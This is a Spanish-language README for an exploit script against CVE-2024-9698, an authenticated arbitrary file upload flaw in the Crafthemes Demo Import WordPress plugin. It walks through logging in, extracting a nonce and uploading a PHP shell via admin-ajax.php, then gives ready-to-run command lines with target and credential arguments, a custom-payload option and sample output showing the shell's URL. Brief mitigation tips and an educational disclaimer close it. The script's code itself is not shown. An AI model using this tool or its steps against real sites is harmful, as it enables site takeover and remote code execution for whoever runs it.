CVE-2024-9698
Exploit de Carga Arbitraria de Archivos en Crafthemes Demo Import <= 3.3
📌 Resumen
Este exploit aprovecha una vulnerabilidad crítica (CVE-2024-9698) en el plugin Crafthemes Demo Import para WordPress. La vulnerabilidad permite a administradores autenticados cargar archivos arbitrarios en el sitio WordPress afectado, lo que conduce a una potencial ejecución remota de código (RCE).
🔍 Detalles de la Vulnerabilidad
- Plugin: Crafthemes Demo Import
- Versiones Afectadas: ≤ 3.3
- ID CVE: CVE-2024-9698
- Severidad: Alta (Puntuación CVSS: 7.2)
- Función Vulnerable:
process_uploaded_files
- Problema: El plugin carece de una validación adecuada del tipo de archivo, lo que permite a los administradores cargar archivos PHP maliciosos en el servidor.
- Impacto Potencial: Los atacantes pueden obtener control total sobre el sitio web mediante la ejecución de comandos arbitrarios.
🎯 Explotación
✅ Requisitos Previos
- Se requieren credenciales de Administrador de WordPress para explotar esta vulnerabilidad.
🚀 Cómo Funciona
- Verificar Vulnerabilidad: El script primero comprueba la versión del plugin extrayendo información de
readme.txt.
- Iniciar Sesión en WordPress: Se autentica como administrador y recupera las cookies de sesión.
- Extraer Token Nonce: Analiza el token nonce requerido para las solicitudes AJAX.
- Cargar Archivo Malicioso: Usa
admin-ajax.php para cargar un shell PHP personalizado.
- Verificar Carga: Confirma la carga exitosa e imprime la URL del shell.
🛠️ Uso
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
📝 Payload Personalizado
Si desea cargar un payload PHP personalizado, use:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
🔥 Ejemplo de Salida
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
🛡️ Mitigación
- Actualice el plugin a una versión parcheada si está disponible.
- Restrinja el acceso de administración a usuarios de confianza.
- Supervise y audite los archivos cargados.
Descargo de responsabilidad: Este script está destinado únicamente a fines educativos y de investigación de seguridad. El uso no autorizado contra sistemas sin permiso explícito es ilegal.